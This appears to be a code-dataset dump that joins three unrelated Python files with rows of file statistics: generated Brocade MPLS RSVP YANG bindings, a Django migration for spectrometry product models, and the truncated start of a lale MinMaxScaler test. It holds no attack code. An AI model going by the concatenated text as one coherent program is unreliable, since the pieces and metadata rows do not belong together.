self.__mpls_rsvp_interface_bypass_interface = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-interface", rest_name="mpls-rsvp-interface-bypass-interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_mpls_rsvp_interface_tunnel_name(self):
"""
Getter method for mpls_rsvp_interface_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_tunnel_name (string)
YANG Description: Bypass LSP name
"""
return self.__mpls_rsvp_interface_tunnel_name
def _set_mpls_rsvp_interface_tunnel_name(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_tunnel_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_tunnel_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_tunnel_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_tunnel_name() directly.
YANG Description: Bypass LSP name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_tunnel_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_tunnel_name = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_tunnel_name(self):
self.__mpls_rsvp_interface_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-tunnel-name", rest_name="mpls-rsvp-interface-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_bypass_tunnel_interface_name(self):
"""
Getter method for mpls_rsvp_interface_bypass_tunnel_interface_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_tunnel_interface_name (string)
YANG Description: Bypass LSP interface name
"""
return self.__mpls_rsvp_interface_bypass_tunnel_interface_name
def _set_mpls_rsvp_interface_bypass_tunnel_interface_name(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_tunnel_interface_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_tunnel_interface_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_tunnel_interface_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_bypass_tunnel_interface_name() directly.
YANG Description: Bypass LSP interface name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_tunnel_interface_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_tunnel_interface_name = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_tunnel_interface_name(self):
self.__mpls_rsvp_interface_bypass_tunnel_interface_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-tunnel-interface-name", rest_name="mpls-rsvp-interface-bypass-tunnel-interface-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_bypass_creation_time(self):
"""
Getter method for mpls_rsvp_interface_bypass_creation_time, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_time (string)
YANG Description: Bypass LSP creation time
"""
return self.__mpls_rsvp_interface_bypass_creation_time
def _set_mpls_rsvp_interface_bypass_creation_time(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_creation_time, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_time (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_creation_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_bypass_creation_time() directly.
YANG Description: Bypass LSP creation time
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_creation_time must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_creation_time = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_creation_time(self):
self.__mpls_rsvp_interface_bypass_creation_time = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-time", rest_name="mpls-rsvp-interface-bypass-creation-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_mpls_rsvp_interface_bypass_creation_location(self):
"""
Getter method for mpls_rsvp_interface_bypass_creation_location, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_location (uint32)
YANG Description: Bypass LSP creation location
"""
return self.__mpls_rsvp_interface_bypass_creation_location
def _set_mpls_rsvp_interface_bypass_creation_location(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_bypass_creation_location, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_bypass_creation_location (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_bypass_creation_location is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_bypass_creation_location() directly.
YANG Description: Bypass LSP creation location
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_bypass_creation_location must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__mpls_rsvp_interface_bypass_creation_location = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_bypass_creation_location(self):
self.__mpls_rsvp_interface_bypass_creation_location = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-rsvp-interface-bypass-creation-location", rest_name="mpls-rsvp-interface-bypass-creation-location", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_mpls_rsvp_interface_assoc_bypass_LSPs(self):
"""
Getter method for mpls_rsvp_interface_assoc_bypass_LSPs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_assoc_bypass_LSPs (string)
YANG Description: Few associated bypass LSP names
"""
return self.__mpls_rsvp_interface_assoc_bypass_LSPs
def _set_mpls_rsvp_interface_assoc_bypass_LSPs(self, v, load=False):
"""
Setter method for mpls_rsvp_interface_assoc_bypass_LSPs, mapped from YANG variable /brocade_mpls_rpc/show_mpls_rsvp_interface_one_interface/output/mpls_rsvp_interface_detail/show_mpls_rsvp_interface_detail/mpls_rsvp_interface_assoc_bypass_LSPs (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_mpls_rsvp_interface_assoc_bypass_LSPs is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mpls_rsvp_interface_assoc_bypass_LSPs() directly.
YANG Description: Few associated bypass LSP names
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mpls_rsvp_interface_assoc_bypass_LSPs must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__mpls_rsvp_interface_assoc_bypass_LSPs = t
if hasattr(self, '_set'):
self._set()
def _unset_mpls_rsvp_interface_assoc_bypass_LSPs(self):
self.__mpls_rsvp_interface_assoc_bypass_LSPs = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-rsvp-interface-assoc-bypass-LSPs", rest_name="mpls-rsvp-interface-assoc-bypass-LSPs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
mpls_rsvp_interface_hello_interval = __builtin__.property(_get_mpls_rsvp_interface_hello_interval, _set_mpls_rsvp_interface_hello_interval)
mpls_rsvp_interface_hello_tolerance = __builtin__.property(_get_mpls_rsvp_interface_hello_tolerance, _set_mpls_rsvp_interface_hello_tolerance)
mpls_rsvp_interface_hello_status = __builtin__.property(_get_mpls_rsvp_interface_hello_status, _set_mpls_rsvp_interface_hello_status)
mpls_rsvp_interface_te_up_thresholds = __builtin__.property(_get_mpls_rsvp_interface_te_up_thresholds, _set_mpls_rsvp_interface_te_up_thresholds)
mpls_rsvp_interface_te_down_thresholds = __builtin__.property(_get_mpls_rsvp_interface_te_down_thresholds, _set_mpls_rsvp_interface_te_down_thresholds)
g_mpls_prot_statistics_pkt_types = __builtin__.property(_get_g_mpls_prot_statistics_pkt_types, _set_g_mpls_prot_statistics_pkt_types)
g_mpls_prot_statistics_errors = __builtin__.property(_get_g_mpls_prot_statistics_errors, _set_g_mpls_prot_statistics_errors)
mpls_rsvp_interface_active_backup_outsegs = __builtin__.property(_get_mpls_rsvp_interface_active_backup_outsegs, _set_mpls_rsvp_interface_active_backup_outsegs)
mpls_rsvp_interface_inactive_backup_outsegs = __builtin__.property(_get_mpls_rsvp_interface_inactive_backup_outsegs, _set_mpls_rsvp_interface_inactive_backup_outsegs)
mpls_rsvp_interface_duplicate_preempts_dropped = __builtin__.property(_get_mpls_rsvp_interface_duplicate_preempts_dropped, _set_mpls_rsvp_interface_duplicate_preempts_dropped)
mpls_rsvp_interface_p2mp_capability = __builtin__.property(_get_mpls_rsvp_interface_p2mp_capability, _set_mpls_rsvp_interface_p2mp_capability)
mpls_rsvp_interface_bypass_interface = __builtin__.property(_get_mpls_rsvp_interface_bypass_interface, _set_mpls_rsvp_interface_bypass_interface)
mpls_rsvp_interface_tunnel_name = __builtin__.property(_get_mpls_rsvp_interface_tunnel_name, _set_mpls_rsvp_interface_tunnel_name)
mpls_rsvp_interface_bypass_tunnel_interface_name = __builtin__.property(_get_mpls_rsvp_interface_bypass_tunnel_interface_name, _set_mpls_rsvp_interface_bypass_tunnel_interface_name)
mpls_rsvp_interface_bypass_creation_time = __builtin__.property(_get_mpls_rsvp_interface_bypass_creation_time, _set_mpls_rsvp_interface_bypass_creation_time)
mpls_rsvp_interface_bypass_creation_location = __builtin__.property(_get_mpls_rsvp_interface_bypass_creation_location, _set_mpls_rsvp_interface_bypass_creation_location)
mpls_rsvp_interface_assoc_bypass_LSPs = __builtin__.property(_get_mpls_rsvp_interface_assoc_bypass_LSPs, _set_mpls_rsvp_interface_assoc_bypass_LSPs)
_pyangbind_elements = {'mpls_rsvp_interface_hello_interval': mpls_rsvp_interface_hello_interval, 'mpls_rsvp_interface_hello_tolerance': mpls_rsvp_interface_hello_tolerance, 'mpls_rsvp_interface_hello_status': mpls_rsvp_interface_hello_status, 'mpls_rsvp_interface_te_up_thresholds': mpls_rsvp_interface_te_up_thresholds, 'mpls_rsvp_interface_te_down_thresholds': mpls_rsvp_interface_te_down_thresholds, 'g_mpls_prot_statistics_pkt_types': g_mpls_prot_statistics_pkt_types, 'g_mpls_prot_statistics_errors': g_mpls_prot_statistics_errors, 'mpls_rsvp_interface_active_backup_outsegs': mpls_rsvp_interface_active_backup_outsegs, 'mpls_rsvp_interface_inactive_backup_outsegs': mpls_rsvp_interface_inactive_backup_outsegs, 'mpls_rsvp_interface_duplicate_preempts_dropped': mpls_rsvp_interface_duplicate_preempts_dropped, 'mpls_rsvp_interface_p2mp_capability': mpls_rsvp_interface_p2mp_capability, 'mpls_rsvp_interface_bypass_interface': mpls_rsvp_interface_bypass_interface, 'mpls_rsvp_interface_tunnel_name': mpls_rsvp_interface_tunnel_name, 'mpls_rsvp_interface_bypass_tunnel_interface_name': mpls_rsvp_interface_bypass_tunnel_interface_name, 'mpls_rsvp_interface_bypass_creation_time': mpls_rsvp_interface_bypass_creation_time, 'mpls_rsvp_interface_bypass_creation_location': mpls_rsvp_interface_bypass_creation_location, 'mpls_rsvp_interface_assoc_bypass_LSPs': mpls_rsvp_interface_assoc_bypass_LSPs, }
| 89.779548 | 1,402 | 0.800012 | 9,409 | 67,604 | 5.339675 | 0.023169 | 0.143349 | 0.180689 | 0.053502 | 0.970562 | 0.961705 | 0.932585 | 0.897036 | 0.882486 | 0.87134 | 0 | 0.009508 | 0.097627 | 67,604 | 752 | 1,403 | 89.898936 | 0.814061 | 0.235297 | 0 | 0.504878 | 0 | 0.041463 | 0.369636 | 0.270696 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131707 | false | 0.139024 | 0.02439 | 0 | 0.265854 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
e108dd6c400a7eb17eabcee8a71c08586d474935 | 5,428 | py | Python | scieio/spectrometry/migrations/0002_gas_gasms_liquid_liquidms.py | arnelimperial/scieio | 279a25766f20d074a3df824c0fbc8b2d8e35f272 | [
"MIT"
] | null | null | null | scieio/spectrometry/migrations/0002_gas_gasms_liquid_liquidms.py | arnelimperial/scieio | 279a25766f20d074a3df824c0fbc8b2d8e35f272 | [
"MIT"
] | 8 | 2021-03-19T01:56:44.000Z | 2022-03-12T00:24:21.000Z | scieio/spectrometry/migrations/0002_gas_gasms_liquid_liquidms.py | arnelimperial/scieio | 279a25766f20d074a3df824c0fbc8b2d8e35f272 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.5 on 2020-04-18 20:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('conditions', '0001_initial'),
('manufacturers', '0001_initial'),
('sellers', '0004_auto_20200418_0002'),
('spectrometry', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Gas',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('spectrometry_category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gases', related_query_name='gas', to='spectrometry.SpectrometryCategory')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
migrations.CreateModel(
name='Liquid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('spectrometry_category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='liquids', related_query_name='liquid', to='spectrometry.SpectrometryCategory')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
migrations.CreateModel(
name='LiquidMS',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('description', models.TextField()),
('product_code', models.CharField(editable=False, max_length=11, unique=True)),
('model', models.CharField(max_length=255, unique=True)),
('warranty', models.BooleanField(default=True)),
('image', models.URLField()),
('availability', models.BooleanField(default=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('condition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='conditions.Condition')),
('liquid_spectrometer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='liquid_spectrometers', related_query_name='liquid_spectrometer', to='spectrometry.Liquid')),
('manufacturer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='manufacturers.Manufacturer')),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sellers.Seller')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
migrations.CreateModel(
name='GasMS',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(editable=False, max_length=255, unique=True)),
('description', models.TextField()),
('product_code', models.CharField(editable=False, max_length=11, unique=True)),
('model', models.CharField(max_length=255, unique=True)),
('warranty', models.BooleanField(default=True)),
('image', models.URLField()),
('availability', models.BooleanField(default=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('condition', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='conditions.Condition')),
('gas_spectrometer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gas_spectrometers', related_query_name='gas_spectrometer', to='spectrometry.Gas')),
('manufacturer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='manufacturers.Manufacturer')),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sellers.Seller')),
],
options={
'ordering': ['id'],
'unique_together': {('name', 'slug')},
},
),
]
| 55.387755 | 209 | 0.58972 | 517 | 5,428 | 6.032882 | 0.187621 | 0.030779 | 0.049375 | 0.077589 | 0.842257 | 0.842257 | 0.842257 | 0.842257 | 0.842257 | 0.842257 | 0 | 0.020626 | 0.258659 | 5,428 | 97 | 210 | 55.958763 | 0.754473 | 0.00829 | 0 | 0.747253 | 1 | 0 | 0.170972 | 0.034009 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021978 | 0 | 0.054945 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0130e8dffdd4fdf3d2fbfab5a1c7e4bbfea17257 | 41,060 | py | Python | test/test_relational_sklearn.py | DorotaDR/lale | d802a6f06692129c9ecade2c99fce277af0adcdc | [
"Apache-2.0"
] | null | null | null | test/test_relational_sklearn.py | DorotaDR/lale | d802a6f06692129c9ecade2c99fce277af0adcdc | [
"Apache-2.0"
] | null | null | null | test/test_relational_sklearn.py | DorotaDR/lale | d802a6f06692129c9ecade2c99fce277af0adcdc | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
import jsonschema
import numpy as np
import pandas as pd
from sklearn.impute import SimpleImputer as SkSimpleImputer
from sklearn.preprocessing import MinMaxScaler as SkMinMaxScaler
from sklearn.preprocessing import OneHotEncoder as SkOneHotEncoder
from sklearn.preprocessing import OrdinalEncoder as SkOrdinalEncoder
from sklearn.preprocessing import StandardScaler as SkStandardScaler
import lale.datasets
import lale.datasets.openml
from lale.datasets.multitable.fetch_datasets import fetch_go_sales_dataset
from lale.expressions import it
from lale.lib.lale import Scan, categorical
from lale.lib.rasl import Map
from lale.lib.rasl import MinMaxScaler as RaslMinMaxScaler
from lale.lib.rasl import OneHotEncoder as RaslOneHotEncoder
from lale.lib.rasl import OrdinalEncoder as RaslOrdinalEncoder
from lale.lib.rasl import SimpleImputer as RaslSimpleImputer
from lale.lib.rasl import StandardScaler as RaslStandardScaler
from lale.lib.sklearn import FunctionTransformer, LogisticRegression
class TestMinMaxScaler(unittest.TestCase):
def setUp(self):
self.go_sales = fetch_go_sales_dataset()
def _check_trained(self, sk_trained, rasl_trained):
self.assertEqual(list(sk_trained.data_min_), list(rasl_trained.impl.data_min_))
self.assertEqual(list(sk_trained.data_max_), list(rasl_trained.impl.data_max_))
self.assertEqual(
list(sk_trained.data_range_), list(rasl_trained.impl.data_range_)
)
self.assertEqual(list(sk_trained.scale_), list(rasl_trained.impl.scale_))
self.assertEqual(list(sk_trained.min_), list(rasl_trained.impl.min_))
self.assertEqual(sk_trained.n_features_in_, rasl_trained.impl.n_features_in_)
self.assertEqual(sk_trained.n_samples_seen_, rasl_trained.impl.n_samples_seen_)
def test_get_params(self):
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_params = sk_scaler.get_params()
rasl_params = rasl_scaler.get_params()
self.assertDictContainsSubset(sk_params, rasl_params)
def test_error(self):
with self.assertRaisesRegex(
jsonschema.ValidationError,
re.compile(r"MinMaxScaler\(copy=False\)", re.MULTILINE | re.DOTALL),
):
_ = RaslMinMaxScaler(copy=False)
with self.assertRaisesRegex(
jsonschema.ValidationError,
re.compile(r"MinMaxScaler\(clip=True\)", re.MULTILINE | re.DOTALL),
):
_ = RaslMinMaxScaler(clip=True)
def test_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
self._check_trained(sk_trained, rasl_trained)
def test_transform(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data)
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_fit_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
self._check_trained(sk_trained, rasl_trained)
def test_transform_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data)
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_partial_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data1 = data[:10]
data2 = data[10:100]
data3 = data[100:]
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.partial_fit(data1)
rasl_trained = rasl_scaler.partial_fit(data1)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data2)
rasl_trained = rasl_scaler.partial_fit(data2)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data3)
rasl_trained = rasl_scaler.partial_fit(data3)
self._check_trained(sk_trained, rasl_trained)
class TestMinMaxScalerSpark(unittest.TestCase):
def setUp(self):
self.go_sales = fetch_go_sales_dataset()
def _check_trained(self, sk_trained, rasl_trained):
self.assertEqual(list(sk_trained.data_min_), list(rasl_trained.impl.data_min_))
self.assertEqual(list(sk_trained.data_max_), list(rasl_trained.impl.data_max_))
self.assertEqual(
